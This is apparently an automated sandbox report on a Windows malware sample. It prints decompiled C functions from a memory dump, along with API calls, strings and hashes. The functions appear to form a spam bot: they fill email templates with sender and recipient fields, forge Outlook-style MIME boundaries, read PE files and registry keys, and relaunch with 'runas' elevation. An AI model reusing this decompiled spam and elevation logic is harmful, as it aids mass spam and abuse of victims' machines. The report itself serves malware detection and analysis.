0x004071f7
0x004071fc
0x004071ff
0x00407203
0x00407227
0x0040722e
0x0040723e
0x0040724c
0x00407251
0x00407254
0x00407256
0x00407258
0x00407258
0x00407256
0x00407280
0x00407282
0x0040728a
0x0040728c
0x004072c2
0x004072c9
0x004072cb
0x004072e6
0x004072e8
0x004072ef
0x004072f2
0x004072f4
0x00407301
0x00407301
0x00407301
0x004072f6
0x004072fc
0x004072fc
0x00407307
0x0040730d
0x0040730f
0x00407338
0x00407339
0x0040733e
0x0040734b
0x0040734e
0x00407354
0x0040735b
0x0040735d
0x004073d5
0x004073d8
0x004073de
0x004073e2
0x004073eb
0x004073f1
0x004073f2
0x004073f4
0x004073f7
0x00000000
0x004073f7
0x00407362
0x00407365
0x00000000
0x00000000
0x0040736d
0x00407370
0x00000000
0x00000000
0x00407372
0x00407375
0x0040737a
0x0040737c
0x0040738d
0x00407393
0x00407395
0x00407397
0x00407397
0x00407395
0x0040739d
0x004073a0
0x004073a2
0x004073a4
0x004073a4
0x004073a6
0x004073a9
0x004073b2
0x004073b8
0x004073b9
0x004073bc
0x004073c4
0x004073ca
0x004073cb
0x004073cd
0x00000000
0x00407311
0x00407314
0x0040731a
0x0040731d
0x00407326
0x0040732c
0x0040732d
0x00000000
0x0040732d
0x0040730f
0x004072d0
0x004072d6
0x00000000
0x0040728e
0x00407291
0x00407297
0x0040729a
0x004072a3
0x004072a9
0x004072aa
0x004072aa
0x004072ac
0x004072af
0x004072b2
0x004071cb
0x004071cf
0x004071cf
0x0040728c
0x00407208
0x0040720e
0x00407212
0x0040721b
0x00407221
0x00407224
0x00000000
0x00407224
0x0040713d
0x00407142
0x00407143
0x00407145
0x0040715e
0x00407166
0x0040716b
0x00000000
0x0040716b
0x0040714b
0x00407154
0x0040715a
0x0040715c
0x00000000
0x00000000
0x00000000
0x0040715c
0x004071b2
0x00000000
0x004071b2

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,73B743E0,?,73B743E0,00000000), ref: 004070C2
RegEnumValueA.ADVAPI32 ref: 0040719E
RegCloseKey.ADVAPI32(73B743E0,?,73B743E0,00000000), ref: 004071B2
RegCloseKey.ADVAPI32(73B743E0), ref: 00407208
RegCloseKey.ADVAPI32(73B743E0), ref: 00407291
___ascii_stricmp.LIBCMT ref: 004072C2
RegCloseKey.ADVAPI32(73B743E0), ref: 004072D0
RegCloseKey.ADVAPI32(73B743E0), ref: 00407314
GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
RegCloseKey.ADVAPI32(73B743E0), ref: 004073D8

Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD

Strings

", xrefs: 00407227
, xrefs: 00407194

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
String ID: $"
API String ID: 4293430545-3817095088
Opcode ID: f7fa99f1004a269bddf57db40b183aae62ae1294250732a5357311ea8bd869c4
Instruction ID: bdd769efad709bd93da993ba4a974553bca105625a5613f565cdc8f40f8c6bf1
Opcode Fuzzy Hash: f7fa99f1004a269bddf57db40b183aae62ae1294250732a5357311ea8bd869c4
Instruction Fuzzy Hash: 8FB17F71D0820ABAEB159FA1DC45BEF77B8AB04304F10047BF501F61D1EB79AA94CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD89, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 121
timeCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040AD89(void* __ecx, void* __eflags) {
				signed int _t48;
				signed int _t50;
				void* _t53;
				intOrPtr _t55;
				void* _t76;
				signed int _t77;
				void* _t81;
				CHAR* _t92;
				void* _t94;
				void* _t96;
				void* _t98;

				_t76 = __ecx;
				_t94 = _t96 - 0x74;
				GetLocalTime(_t94 + 0x50);
				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
				E0040AD08(_t94 - 0x110);
				_t98 = _t96 - 0x184 + 0x10;
				if(E004030B5() == 0) {
					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
				} else {
					_push(_t94 - 0x90);
					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
				}
				_t48 = E0040ECA5();
				_t77 = 0xe;
				_t50 = E0040ECA5();
				_t92 = "%OUTLOOK_BND_";
				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				while(1) {
					_t103 = _t53;
					if(_t53 == 0) {
						break;
					}
					_t55 = E0040EDAC(_t53 + 0xd);
					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
					__eflags = _t81;
					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
					_t98 = _t98 + 0x40;
					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				}
				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}

APIs

GetLocalTime.KERNEL32(?), ref: 0040AD98
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6

Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F

Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2

wsprintfA.USER32 ref: 0040AEA5

Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9

wsprintfA.USER32 ref: 0040AE4F
wsprintfA.USER32 ref: 0040AE5E

Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0

Strings

%OUTLOOK_MID, xrefs: 0040AEAE
%s%d, xrefs: 0040AE58
----=_NextPart_%03d_%04X_%08.8lX.%08.8lX, xrefs: 0040AE49
127.0.0.1, xrefs: 0040ADEB
%OUTLOOK_HST, xrefs: 0040AEC5
%OUTLOOK_BND_, xrefs: 0040AE0F, 0040AE14, 0040AE57, 0040AE76
%04x%08.8lx$%08.8lx$%08x@%s, xrefs: 0040AE9F

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
API String ID: 3631595830-1816598006
Opcode ID: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
Opcode Fuzzy Hash: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040675C, Relevance: 19.7, APIs: 13, Instructions: 199
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040675C(CHAR* _a4, long* _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				void _v68;
				long _v72;
				void _v132;
				intOrPtr _v320;
				signed int _v360;
				signed int _v374;
				void _v380;
				void* _t85;
				long _t88;
				long _t102;
				struct _OVERLAPPED* _t103;
				long _t115;
				long _t120;
				signed int _t143;
				void* _t146;

				_v16 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 0x80);
				}
				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				_v12 = _t85;
				if(_t85 == 0xffffffff) {
					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
				}
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 2);
				}
				if(_v12 != 0xffffffff) {
					_t88 = GetFileSize(_v12, 0);
					_v8 = _t88;
					if(_t88 == 0xffffffff || _t88 == 0) {
						L31:
						_v8 = 0;
					} else {
						_a12 = 0;
						_v28 = 0;
						if(ReadFile(_v12,  &_v132, 0x40,  &_a12, 0) == 0 || SetFilePointer(_v12, _v72, 0, 0) == 0xffffffff || ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0) == 0 || SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0) == 0xffffffff) {
							goto L31;
						} else {
							_v20 = 0;
							_v24 = 0;
							if(0 < _v374) {
								while(1) {
									_t115 = 0x28;
									_a12 = _t115;
									if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
										break;
									}
									_t143 = _v374 & 0x0000ffff;
									if(_v24 != _t143 - 1) {
										_t120 = _v48 + _v52;
									} else {
										_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
									}
									_a12 = _t120;
									if(_v20 < _t120) {
										_v20 = _t120;
									}
									_v24 = _v24 + 1;
									if(_v24 < _t143) {
										continue;
									} else {
									}
									goto L23;
								}
								_v8 = 0;
							}
							L23:
							if(_v24 >= (_v374 & 0x0000ffff)) {
								_t102 = _v20;
								if(_v8 > _t102) {
									_v8 = _t102;
								}
								_t103 = E0040EBCC(_v8);
								_v16 = _t103;
								if(_t103 == 0) {
									goto L31;
								} else {
									if(SetFilePointer(_v12, 0, 0, 0) == 0xffffffff) {
										L30:
										_v8 = 0;
										E0040EC2E(_v16);
										_v16 = 0;
									} else {
										_t146 = _v16;
										if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
											goto L30;
										} else {
											 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
											_v8 = _v20;
										}
									}
								}
							}
						}
					}
					CloseHandle(_v12);
				}
				 *_a8 = _v8;
				return _v16;
			}

0x0040676a
0x0040676d
0x00406778
0x0040677e
0x0040677e
0x0040679a
0x0040679c
0x004067a2
0x004067b2
0x004067b2
0x004067b8
0x004067bf
0x004067bf
0x004067c9
0x004067d3
0x004067d9
0x004067df
0x0040696b
0x0040696b
0x004067ed
0x00406801
0x00406804
0x0040680b
0x00000000
0x00406867
0x00406869
0x0040686c
0x00406876
0x00406878
0x0040687a
0x00406881
0x0040688f
0x00000000
0x00000000
0x00406891
0x0040689e
0x004068ba
0x004068a0
0x004068b2
0x004068b2
0x004068bd
0x004068c3
0x004068c5
0x004068c5
0x004068c8
0x004068ce
0x00000000
0x00000000
0x004068d0
0x00000000
0x004068ce
0x004068d2
0x004068d2
0x004068d5
0x004068df
0x004068e5
0x004068eb
0x004068ed
0x004068ed
0x004068f3
0x004068f9
0x004068fe
0x00000000
0x00406900
0x0040690b
0x0040695a
0x0040695d
0x00406960
0x00406966
0x0040690d
0x0040690d
0x00406920
0x00000000
0x00406922
0x0040694f
0x00406955
0x00406955
0x00406920
0x0040690b
0x004068fe
0x004068df
0x0040680b
0x00406971
0x00406971
0x0040697f
0x00406986

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,73B743E0,00000000), ref: 0040677E
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,73B743E0,00000000), ref: 0040679A
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,73B743E0,00000000), ref: 004067B0
SetFileAttributesA.KERNEL32(?,00000002,?,73B743E0,00000000), ref: 004067BF
GetFileSize.KERNEL32(000000FF,00000000,?,73B743E0,00000000), ref: 004067D3
ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,73B743E0,00000000), ref: 00406807
SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040681F
ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,73B743E0,00000000), ref: 0040683E
SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040685C
ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,73B743E0,00000000), ref: 0040688B
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,73B743E0,00000000), ref: 00406906
ReadFile.KERNEL32(000000FF,?,00000000,00408244,00000000,?,73B743E0,00000000), ref: 0040691C
CloseHandle.KERNEL32(000000FF,?,73B743E0,00000000), ref: 00406971

Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Read$Pointer$AttributesCreateHeap$CloseFreeHandleProcessSize
String ID:
API String ID: 2622201749-0
Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00409326, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 284
registryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00409326(void* __ecx, void* __edx) {
				void* __ebx;
				char _t88;
				void* _t89;
				int _t92;
				void* _t96;
				signed int _t97;
				signed int _t100;
				signed int _t103;
				char* _t106;
				char* _t111;
				signed int _t112;
				char* _t116;
				signed int _t117;
				int _t119;
				void* _t146;
				signed int _t155;
				int _t161;
				signed int _t165;
				signed int _t167;
				void* _t168;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t176;

				_t146 = __ecx;
				_t168 = _t170 - 0x60;
				E00401910(0x19bc);
				 *(_t168 - 0x58) = 0x9c;
				if(GetVersionExA(_t168 - 0x58) == 0) {
					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
					_t9 = _t168 + 0x58;
					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
					__eflags =  *_t9;
				} else {
					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
				}
				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
				if(_t88 == 0) {
					 *(_t168 - 0x15c) = _t88;
				}
				_push( *((intOrPtr*)(_t168 + 0x70)));
				_t89 = _t168 - 0x15c;
				if( *(_t168 + 0x78) == 0) {
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
					_t172 = _t170 + 0x40;
				} else {
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
					_t172 = _t170 + 0x38;
				}
				 *(_t168 + 0x78) = _t92;
				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
				_t173 = _t172 + 0xc;
				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
					_push(_t168 - 0x15c);
					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
					_t173 = _t173 + 0x50;
				}
				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
				 *(_t168 + 0x5c) = E00406EDD();
				if( *(_t168 + 0x58) < 0x60) {
					_t165 =  *(_t168 + 0x78);
					_t161 = 0;
					__eflags = 0;
					L33:
					__eflags =  *(_t168 + 0x5c) - _t161;
					if( *(_t168 + 0x5c) == _t161) {
						L38:
						_push(_t168 - 0x95c);
						_push(_t161);
						L39:
						_t96 = E004091EB();
						__eflags =  *0x412180 - _t161; // 0x0
						if(__eflags != 0) {
							 *0x412180 =  *0x412180 | _t165;
							__eflags =  *0x412180;
						}
						__eflags = _t96 - 0x2a;
						_t81 = _t96 == 0x2a;
						__eflags = _t81;
						_t97 = 0 | _t81;
						L42:
						return _t97;
					}
					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
					__eflags = _t100;
					if(_t100 != 0) {
						_push(_t168 - 0x95c);
						_push("runas");
						goto L39;
					}
					_t103 =  *(_t168 + 0x78) | 0x5e060000;
					__eflags = _t103;
					 *0x412180 = _t103;
					 *0x41217c =  *(_t168 + 0x54);
					if(_t103 != 0) {
						 *0x412180 = _t103 | _t165;
					}
					L31:
					_t97 = 0;
					goto L42;
				}
				 *(_t168 + 0x4c) = 4;
				 *(_t168 + 0x44) = 5;
				 *(_t168 + 0x48) = 1;
				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
				_t175 = _t173 + 0x14;
				if(RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50) == 0) {
					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
					_t176 = _t175 + 0x14;
					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c);
					__eflags = _t112;
					if(_t112 == 0) {
						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
						_t176 = _t176 + 0x14;
						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c);
						__eflags = _t117;
						if(_t117 != 0) {
							 *(_t168 + 0x78) = 0x3000;
						}
					} else {
						 *(_t168 + 0x78) = 0x2000;
					}
					RegCloseKey( *(_t168 + 0x50));
					_t165 =  *(_t168 + 0x78);
				} else {
					_t165 = 0x1000;
				}
				_t161 = 0;
				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
					if( *(_t168 + 0x5c) <= _t161) {
						goto L38;
					}
					_t119 =  *(_t168 - 0x4c);
					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
						 *0x41217c = _t119;
						_t167 = _t165 | 0x5e060106;
						__eflags = _t167;
						goto L30;
					} else {
						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
							 *0x41217c = _t161;
							_t167 = _t165 | 0x5e060107;
							L30:
							 *0x412180 = _t167;
							goto L31;
						}
						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
						if(_t97 == _t161) {
							_t155 =  *(_t168 + 0x78) | 0x5e060000;
							 *0x412180 = _t155;
							 *0x41217c =  *(_t168 + 0x5c);
							if(_t155 != 0) {
								 *0x412180 = _t155 | _t165;
							}
						}
						goto L42;
					}
				} else {
					goto L33;
				}
			}

0x00409326
0x00409327
0x00409330
0x00409339
0x00409348
0x00409358
0x0040935c
0x0040935c
0x0040935c
0x0040934a
0x00409353
0x00409353
0x00409375
0x0040937d
0x0040937f
0x0040937f
0x0040938c
0x00409394
0x004093a2
0x004093d9
0x004093dc
0x004093dd
0x004093e0
0x004093e3
0x004093e6
0x004093e9
0x004093ec
0x0040940c
0x00409412
0x004093a4
0x004093a4
0x004093a5
0x004093a8
0x004093ab
0x004093ae
0x004093b1
0x004093ce
0x004093d4
0x004093d4
0x0040941d
0x00409420
0x00409425
0x0040942c
0x00409441
0x0040945d
0x0040946b
0x0040948d
0x0040949b
0x004094a0
0x004094a0
0x004094a3
0x004094b0
0x004094b3
0x0040962f
0x00409632
0x00409632
0x00409634
0x00409634
0x00409637
0x0040967b
0x00409681
0x00409682
0x00409683
0x00409683
0x0040968a
0x00409690
0x00409692
0x00409692
0x00409692
0x0040969a
0x0040969d
0x0040969d
0x004096a0
0x004096a2
0x004096a9
0x004096a9
0x00409641
0x00409648
0x0040964a
0x00409673
0x00409674
0x00000000
0x00409674
0x00409652
0x00409652
0x00409657
0x0040965c
0x00409662
0x00409666
0x00409666
0x0040962b
0x0040962b
0x00000000
0x0040962b
0x004094ce
0x004094d5
0x004094dc
0x004094e3
0x004094e8
0x004094f9
0x0040951a
0x0040951f
0x00409526
0x0040952c
0x0040952e
0x00409551
0x00409556
0x0040955d
0x00409563
0x00409565
0x00409567
0x00409567
0x00409530
0x00409530
0x00409530
0x00409571
0x00409577
0x004094fb
0x004094fb
0x004094fb
0x0040957a
0x0040957f
0x0040958d
0x00000000
0x00000000
0x00409597
0x0040959a
0x0040961a
0x0040961f
0x0040961f
0x00000000
0x004095a3
0x004095c0
0x0040960c
0x00409612
0x00409625
0x00409625
0x00000000
0x00409625
0x004095d1
0x004095db
0x004095e7
0x004095ed
0x004095f3
0x004095f9
0x00409601
0x00409601
0x004095f9
0x00000000
0x004095db
0x00000000
0x00000000
0x00000000

APIs

GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
wsprintfA.USER32 ref: 004093CE
wsprintfA.USER32 ref: 0040940C
wsprintfA.USER32 ref: 0040948D
RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571

Strings

runas, xrefs: 00409674

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
String ID: runas
API String ID: 3696105349-4000483414
Opcode ID: 39fed90ea0b0135417720848aca6477500bc3b8d16e57ae1224dc115a7fc5789
Instruction ID: da9afcecd92b156e9615c74a35b5fd413d23f2be442cf1ef3c4bc4ea64e4b0a2
Opcode Fuzzy Hash: 39fed90ea0b0135417720848aca6477500bc3b8d16e57ae1224dc115a7fc5789
Instruction Fuzzy Hash: 54A181B2540208BBEB21DFA1CC45FDF3BACEB44744F104437FA05A6192D7B999848FA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F315, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 103networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(0040CA1D), ref: 0040F34D
socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
closesocket.WS2_32(00000000), ref: 0040F375

Strings

time_cfg, xrefs: 0040F323
ps, xrefs: 0040F375, 0040F3A0

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: closesockethtonssocket
String ID: ps$time_cfg
API String ID: 311057483-1008165782
Opcode ID: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
Opcode Fuzzy Hash: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3C5, Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v132;
				void* _t46;
				char* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				E00405CE1(_a4, 0x3e800, _a16, 0, 0);
				E0040EF00( &_v132, "%FROM_EMAIL");
				E00405CE1( &_v132, 0x64, _a16, 0, 0);
				_t71 = E0040ED03( &_v132, 0x40);
				_t77 = _t76 + 0x38;
				_t83 = _t71;
				if(_t71 != 0) {
					_t7 = _t71 + 1; // 0x1
					E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
					 *_t71 = 0;
					E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
					_t77 = _t77 + 0x28;
				}
				_t72 = _a12;
				E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
				E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
				_t73 = _a4;
				E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
				_t46 = E0040F0CB( &_v132);
				_push(0);
				_push( &_v132);
				_push(_t46);
				E0040F133();
				E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
				_push(_t73);
				E0040AD89( &_v132, _t83);
				E0040B211(0,  &_v132, 0);
				E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 5);
				E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 0xfffffffb);
				E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
				_t75 = _a8;
				 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
				return _t75;
			}

APIs

wsprintfA.USER32 ref: 0040B467

Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0

Strings

%TO_EMAIL, xrefs: 0040B473
%TO_USER, xrefs: 0040B488
%DATE, xrefs: 0040B4D2
%FROM_EMAIL, xrefs: 0040B3E9
%TO_DOMAIN, xrefs: 0040B44B
%FROM_DOMAIN, xrefs: 0040B41E
%M5DATE, xrefs: 0040B50F
%s@%s, xrefs: 0040B461
%FROM_USER, xrefs: 0040B431
%TO_HASH, xrefs: 0040B4B0
%P5DATE, xrefs: 0040B4F2

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$wsprintf
String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
API String ID: 1220175532-2340906255
